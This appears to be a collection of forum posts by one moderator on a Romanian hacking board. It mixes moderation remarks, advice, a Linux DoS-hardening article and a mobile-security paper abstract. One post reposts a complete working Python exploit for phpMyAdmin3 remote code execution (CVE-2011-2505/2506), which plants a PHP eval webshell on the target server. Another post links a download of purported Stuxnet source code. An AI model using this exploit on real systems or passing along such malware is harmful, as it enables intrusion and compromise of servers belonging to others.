Nytro

Trebuie sa inlocuiesti "//TODO" cu o bucata de cod, iar codul asa cum este sa afiseze 31337. E o "smecherie".

Serverul e componenta care face chestiile "naspa" de aceea serverul e detectabil. Clientul doar "comanda" serverului ce sa faca.

Mozilla Firefox Download: http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-mozilla-aurora/firefox-7.0a2.en-US.win32.installer.exe

Alt topic de 2 lei. Mai inchidem din ele...

Are ban de mult dar nu bate ochiu' pana la ha5hz0r Banned

Nu vazusem Nu stiu, sa vad daca se poate face ceva...

phpMyAdmin3 (pma3) Remote Code Execution Exploit #!/usr/bin/env python # coding=utf-8 # pma3 - phpMyAdmin3 remote code execute exploit # Author: wofeiwo<wofeiwo@80sec.com<script type="text/javascript"> /* <![CDATA[ */ (function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})(); /* ]]> */ </script>> # Thx Superhei # Tested on: 3.1.1, 3.2.1, 3.4.3 # CVE: CVE-2011-2505, CVE-2011-2506 # Date: 2011-07-08 # Have fun, DO *NOT* USE IT TO DO BAD THING. ################################################ # Requirements: 1. "config" directory must created&writeable in pma directory. # 2. session.auto_start = 1 in php.ini configuration. import os,sys,urllib2,re def usage(program): print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code execute exploit" print "Usage: %s <PMA_url>" % program print "Example: %s http://www.test.com/phpMyAdmin" % program sys.exit(0) def main(args): try: if len(args) < 2: usage(args[0]) if args[1][-1] == "/": args[1] = args[1][:-1] # ??????????token??sessionid??sessionid??phpMyAdmin???????µ? print "[+] Trying get form token&session_id.." content = urllib2.urlopen(args[1]+"/index.php").read() r1 = re.findall("token=(\w{32})", content) r2 = re.findall("phpMyAdmin=(\w{32,40})", content) if not r1: r1 = re.findall("token\" value=\"(\w{32})\"", content) if not r2: r2 = re.findall("phpMyAdmin\" value=\"(\w{32,40})\"", content) if len(r1) < 1 or len(r2) < 1: print "[-] Cannot find form token and session id...exit." sys.exit(-1) token = r1[0] sessionid = r2[0] print "[+] Token: %s , SessionID: %s" % (token, sessionid) # ??????????swekey.auth.lib.php????$_SESSION??? print "[+] Trying to insert payload in $_SESSION.." uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA" url = args[1]+uri opener = urllib2.build_opener() opener.addheaders.append(('Cookie', 'phpMyAdmin=%s; pma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' % (sessionid, sessionid))) urllib2.install_opener(opener) urllib2.urlopen(url) # ????setup???shell print "[+] Trying get webshell.." postdata = "phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save" % (sessionid, token) url = args[1]+"/setup/config.php" # print "[+]Postdata: %s" % postdata urllib2.urlopen(url, postdata) print "[+] All done, pray for your lucky!" # ??????????????shell url = args[1]+"/config/config.inc.php" opener.addheaders.append(('Code', 'phpinfo();')) urllib2.install_opener(opener) print "[+] Trying connect shell: %s" % url result = re.findall("System \</td\>\<td class=\"v\"\>(.*)\</td\>\</tr\>", urllib2.urlopen(url).read()) if len(result) == 1: print "[+] Lucky u! System info: %s" % result[0] print "[+] Shellcode is: eval(getenv('HTTP_CODE'));" else: print "[-] Cannot get webshell." except Exception, e: print e if __name__ == "__main__" : main(sys.argv) Nu l-am incercat, pe cine intereseaza sa incerce. Sursa: phpMyAdmin3 (pma3) Remote Code Execution Exploit

Probleme tehnice. Practic nu stiu daca iti vei recupera mesajul.

Bine ai venit. Suntem toti romani, deci vei putea vorbi linistit in romana.

"In February 1998, ReactOS began." ( ReactOS's history - ReactOS Website ) O sa treaca vreo 20 de ani pana sa ajunga la nivelul la care a ajuns Microsoft cu Windows 7.

Eu m-am angajat (nu la politie ) si nu mai am foarte mult timp liber cum aveam in trecut. Insa si acum, de la munca, intru pe RST sa vad care e situatia. Tema de lucru: faceti-va CV-ul! Asa veti vedea ce cunostinte ati acumulat. Asa veti vedea ce treceti la categoris "Proiecte". Nu treceti 100 de limbaje de programare de care ati auzit sau ati citit un cod sursa. - Stii C/C++? Atunci stii care e diferenta intre "const int *p" si "int const *p" (nu e) si diferenta intre constructorul de copiere si supraincarcarea operatorului = cu parametru referinta la tipul curent, sau ce e ala placement new, sau mostenire virtuala. - Stii VB6? Atunci stii si cate tipuri de Property-uri sunt (Let, Get, Set), ce face Option Explicit/Base/Module sau multe altele. - Stii PHP? Atunci stii cu ce se mananca __get, __invoke, stii sa serializezi un obiect si sa creezi o clasa abstracta. Daca nu stii astfel de lucruri nu poti spune ca stii acel limbaj de programare pentru ca ai reusit sa faci un "Hello world" sau sa apelezi doua functii. Incercati acest experiment, nu o sa va placa rezultatele. Apoi va puteti compara CV-urile de exemplu. Sau puteti sa purtati niste discutii tehnice, si atunci vedeti care e mai bun. Vorbiti cu Tinkode, daemien, tdxev despre SQL Injection, voi astia cu Havij-ul, apoi vedeti cat SQL Injection stiti. Asta ca exemplu. In fine, nu "RST"-ul e de vina. Daca e sa mearga RST-ul prost NOI suntem de vina, adica si VOI astia cu gura mare, care v-ati zbatut atat de mult pentru RST si care stateati la 4 dimineata sa vedeti lucruri interesante pe Twitter si sa le postati, doar ca sa ii ajutati pe ceilalti. Vizualizati-va propriile posturi si mai ales topicurile create apoi veniti aici cu sugestii. Faceti asta macar de curiozitate. Da, problema e "prietenia" asta dintre voi, faptul ca va "iubiti" intre voi. Va atacati prin orice mijloc si incercati sa faceti rau fara niciun scop. Va jigniti si va injurati de parca cine injura mai bine este mai tare. Va suparati daca cineva va face o critica constructiva, va suparati daca "va cearta" cineva. Asta e dovada de imaturitate. Bla bla, daca nu aveti pe cine da vina, puteti da vina pe mine. Eu sunt foarte sensibil si iar o sa ma duc sa plang pentru ca ma cearta un membru RST.

/* This file has been generated by the Hex-Rays decompiler. Copyright © 2009 Hex-Rays <info@hex-rays.com> Detected compiler: Visual C++ */

Stuxnet Source Code Released Posted by The Hacker News On 1:05 AM Stuxnet is a Microsoft Windows computer worm discovered in July 2010 that targets industrial software and equipment. While it is not the first time that crackers have targeted industrial systems,it is the first discovered malware that spies on and subverts industrial systems,and the first to include a programmable logic controller (PLC) rootkit. Stuxnet is designed to programmatically alter Programmable Logic Controllers (PLCs) used in those facilities. In an ICS environment, the PLCs automate industrial type tasks such as regulating flow rate to maintain pressure and temperature controls. Download: http://www.multiupload.com/BDNYSCY5PC Sursa: Stuxnet Source Code Released Online - Download Now ~ THN : The Hacker News

Multe chestii interesante: http://skypher.com/wiki/index.php/Main_Page

Tot respectul pentru cei care l-au facut, baieti destepti.

Pe aici nu exista foarte mult bun simt, dar cred ca te vei acomoda repede. Bine ai venit.

Probleme "tehnice". Nu. E tot VIP.

Protecting Linux Against DoS/DDoS Attacks Tuesday, June 28, 2011 Contributed By: Jamie Adams When I first heard ridiculous-sounding terms like smurf attack, fraggle attack, Tribal Flood Network (TFN), Trinoo, TFN2K, and stacheldraht, I didn't take them too seriously for a couple of reasons — I worked mainly on non-Internet facing systems, and I was never a victim. I thought it was primarily a network or application administrator's problem. I am not too proud to admit that I was completely wrong. The truth is that I only had a grasp of the impact of such attacks but I didn't know anything about the methods and the things that can and should be done at the operating system level. I have been neck-deep in completing documentation for our product's Common Criteria for Information Technology Security Evaluation (ISO/IEC 15408) submission so I hadn't had much time to think about topics for a blog post. Besides, how can I compete with all of these eye-catching,dramatic headlines about LulzSec, Anonymous, and Ryan Cleary? A co-worker asked me how our Security Blanket operating system lock down tool could help against denial-of-service (DoS) attacks. So began my research and I quickly had the epiphany that I barely knew anything about DoS attacks. Of course this topic is far too broad and complex to cover in one blog post but I am going to highlight some of my findings. First of all, I strongly recommend visiting the SANS Institute InfoSec Reading Room and reading “A Summary of DoS/DDoS Prevention, Monitoring and Mitigation Techniques in a Service Provider Environment.” Secondly, read the W3C's “The World Wide Web Security FAQ - Securing against Denial of Service attacks.” In “HACKING the art of exploitation”1, Erikson describes two general forms of DoS attacks: those that crash services and those that flood services. Wikipedia goes on to describe five basic types of attacks: Consumption of computational resources, such as bandwidth, disk space, or processor time. Disruption of configuration information, such as routing information. Disruption of state information, such as unsolicited resetting of TCP sessions. Disruption of physical network components. Obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately. The W3C defines DoS as “an attack designed to render a computer or network incapable of providing normal services. The most common DoS attacks will target the computer's network bandwidth or connectivity. Bandwidth attacks flood the network with such a high volume of traffic, that all available network resources are consumed and legitimate user requests can not get through. Connectivity attacks flood a computer with such a high volume of connection requests, that all available operating system resources are consumed, and the computer can no longer process legitimate user requests.” The W3C differentiates a DoS attack from a Distributed Denial of Service (DDoS) attack. The DDoS “attack uses many computers to launch a coordinated DoS attack against one or more targets. Using client/server technology, the perpetrator is able to multiply the effectiveness of the Denial of Service significantly by harnessing the resources of multiple unwitting accomplice computers which serve as attack platforms.” In the case of smurf and fraggle attacks, one method of prevention is to configure the router to block broadcast packets that did not originate from that network. On Linux systems, you can configure the kernel to disregard ICMP ECHO and TIMESTAMP requests that were sent to broadcast or multicast addresses by setting the kernel parameter net.ipv4.icmp_echo_ignore_broadcasts to one. When it comes to “SYN flood” DoS form of attacks, you can configure Linux to send out requests (syncookies) to remote hosts if they are flooding your system’s backlog queue with SYN packets; to enable this set the kernel parameter net.ipv4.tcp_syncookies to one. These requests check whether or not the inbound SYN packets are legitimate. In cases where these inbound SYN packets are not legitimate, your system might be experiencing a “SYN flood” DoS attack. Enabling this option on a system under normal load is useful. If your system is under high load it will make new connections but without advanced features such as explicit congestion notification (ECN) or selective acknowledgment (SACK). All of the normal hardening procedures for the operating system will of course help. Namely, it will help reduce the likelihood your system will become compromised and become the platform for which attacks will be launched. Additionally, it is critical to know what software is present on your system. One technique to monitor this is to baseline (or fingerprint) your system to include the use of cryptographic hashes where possible. Then periodically, perform another baseline and compare it to the previous one. The use of host-based firewalls (e.g., iptables) is strongly encouraged as well as disabling of unnecessary server services. System minimization has been a topic in many of my posts before and I believe it is one of the easiest but most effective techniques because it reduces your “attack surface.” The W3C FAQ also says, “assume a service should be turned off, unless it is absolutely required.” And I would take it one step further by removing the software packages associated with those unused services. Safeguarding and monitoring operating systems against DoS and DDoS are areas which I continue to learn about and develop techniques. Please, share your knowledge and techniques so we all might learn. Sursa: https://www.infosecisland.com/blogview/14788-Protecting-Linux-Against-DoSDDoS-Attacks.html

A Window Into Mobile Device Security Examining the security approaches employed in Apple’s iOS and Google’s Android Carey Nachenberg VP, Fellow Contents Executive Summary............................................1 Introduction........................................................1 Mobile Security Goals.........................................2 Web-based and network-based attacks ......2 Malware ........................................................2 Social Engineering Attacks...........................3 Resource Abuse.............................................3 Data Loss ......................................................3 Data Integrity Threats...................................3 Device Security Models......................................3 Apple iOS.......................................................4 Android........................................................10 iOS vs. Android: Security Overview...................17 Device Ecosystems ............................................17 Mobile Security Solutions................................20 Mobile Antivirus..........................................20 Secure Browser...........................................21 Mobile Device Management (MDM)...........21 Enterprise Sandbox.....................................21 Data Loss Prevention (DLP)........................22 Conclusion........................................................22 Download: http://www.symantec.com/content/en/us/about/media/pdfs/symc_mobile_device_security_june2011.pdf

Au primit multi. Exista categoria "Ajutor". Exista categoria "Cereri". Exista n posturi in care specific sa nu se ceara ajutorul sau alte prostii in aceasta categorie. Exista x persoane care au primit avertisment pentru asa ceva, nu trebuie sa te simti special.

Ca azi sunt de obicei, insa doar azi am ceva timp liber si am timp sa dau avertismente si banuri. Ca nu prea am mai activat de o saptamana-doua.

Da, poate fi foarte util. Oricum, e publica de putin timp. O sa fac niste teste sa vad daca reusesc ceva automatizare.

Foarte interesant. Ai numai posturi interesante. Ban.

A fost un experiment. Am anuntat de "x" ori. Si nu eu am dat Add la cele 1000 de persoane din lista, doar la cateva. Si tot nu inteleg de unde tot primeam add-uri legate de Metin. Si exista optiunea "Ignore".

La Academia Tehnica Militara nu e tocmai "frumos"... Din mai multe motive: - nu ai foarte multa libertate: nu prea poti lipsi de la cursuri, se verifica camerele uneori, nu ai voie sa iesi de capul tau, sa vii mai tarziu de 23:00 parca, trebuie sa iesi cu invoire, o gramada de chestii - trebuie sa stii si o sa fii forjat cu o gramada de matematica si fizica. Daca vrei sa mergi acolo pentru informatica, nu e alegerea potrivita - da, o sa iesi cu salariu, venit stabil, dar trebuie sa semnezi contract pe 10 ani, si nu poti sa iti dai demisia, cred ca te pun sa platesti daune - la fel cu facultatea, daca vrei sa o abandonezi, trebuie sa platesti cat ai stat - va pun brom in mancare/bautura, in ceai am inteles ca sa nu vi se mai scoale. Sa nu mai aveti asa chef de sex - dimineata trezirea, dati ture pe acolo si tot felul de alte prostii, pe langa datul cu matura prin curte - trebuie sa purtati uniformele alea urate, vara muriti de cald, iarna degerati - salariile nu sunt foarte mari, sfatul meu e sa dai la STS, probele fizice sunt date la misto dar cele scrise sunt mai grele, la MApN am inteles ca nu sunt salarii foarte mari Sunt multe motive pentru care iti recomand sa nu te duci acolo, dar e alegerea ta. Eu iti spun parerea mea si ce am vorbit cu persoane de acolo, cunosc mai multe.